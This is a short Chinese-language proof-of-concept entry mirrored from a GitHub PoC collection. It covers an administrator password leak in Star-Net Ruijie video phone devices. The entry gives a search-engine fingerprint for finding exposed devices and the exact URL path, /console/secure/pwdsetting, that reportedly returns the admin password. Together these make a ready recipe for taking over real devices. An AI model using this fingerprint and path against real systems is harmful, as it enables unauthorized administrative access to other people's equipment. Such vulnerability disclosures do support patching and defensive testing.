mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
28 lines
883 B
Markdown
28 lines
883 B
Markdown
|
|
# 星网锐捷视频话机设备pwdsetting管理密码泄漏
|
||
|
|
|
||
|
|
**一、漏洞简介**
|
||
|
|
<font style="color:rgb(34, 34, 34);">星网锐捷视频话机设备 泄露管理员密码,攻击者可利用密码直接进入后台配置页面,执行恶意操作,为进一步攻击提供帮助。</font>
|
||
|
|
**二、影响版本**
|
||
|
|
|
||
|
|
星网锐捷视频话机设备
|
||
|
|
|
||
|
|
**三、资产测绘**
|
||
|
|
|
||
|
|
```plain
|
||
|
|
body="tmid_top_label"
|
||
|
|
```
|
||
|
|
|
||
|
|
●登录页
|
||
|
|
|
||
|
|
**四、漏洞复现**
|
||
|
|
|
||
|
|
```plain
|
||
|
|
/console/secure/pwdsetting
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
> 更新: 2024-06-24 11:42:25
|
||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmom2yrgpqpou44c>
|